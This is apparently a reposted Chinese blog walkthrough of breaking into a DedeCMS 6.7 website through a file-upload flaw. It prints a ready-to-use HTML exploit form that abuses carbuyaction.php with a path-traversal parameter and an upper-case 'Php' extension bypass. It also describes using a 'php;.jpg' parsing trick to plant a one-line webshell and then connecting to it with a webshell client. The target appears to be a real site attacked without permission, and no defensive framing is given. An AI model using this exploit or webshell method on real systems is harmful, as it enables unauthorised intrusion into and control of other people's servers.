• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    织梦cms v6.7最新上传漏洞

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    下面是  织梦dedecms  6.7上传漏洞
    目标站点   爬出来全是html
     








     
    御剑扫描一下
     


     
     
     
    打开一看是织梦的,可以注册。
    前些天看到过大牛发表的织梦上传漏洞
    <form action=" www.2cto.com /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
        file:<input name="uploadfile" type="file" /><br>
        newname:<input name="newname" type="text" value="myfile.Php"/>
         <button class="button2" type="submit">提交</button><br><br>
    1,必须登陆用户。<br>
    2,将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。<br>
    3,newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。<br>
    </form>
     
    于是注册用户,涛涛电脑知识网,构造html文件,将文件格式改为rar,进行上传一句话
     
     


     
     
    结果并没有那么简单,
     


    怎么回事呢?我尝试了改其他格式的文件名都无法上传。
    因为上传之后文件是直接在站点根目录,所以我想到了解析漏洞php;.jpg
     
     
     


     
     
    页面出现空白
     


    用菜刀连接一下,涛涛电脑知识网,



    成功进入。谢谢观看
    原文:情 blog

  • 上一篇:又拍图片管家支付漏洞造成非法充值
  • 下一篇:Mysql引发的血案
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1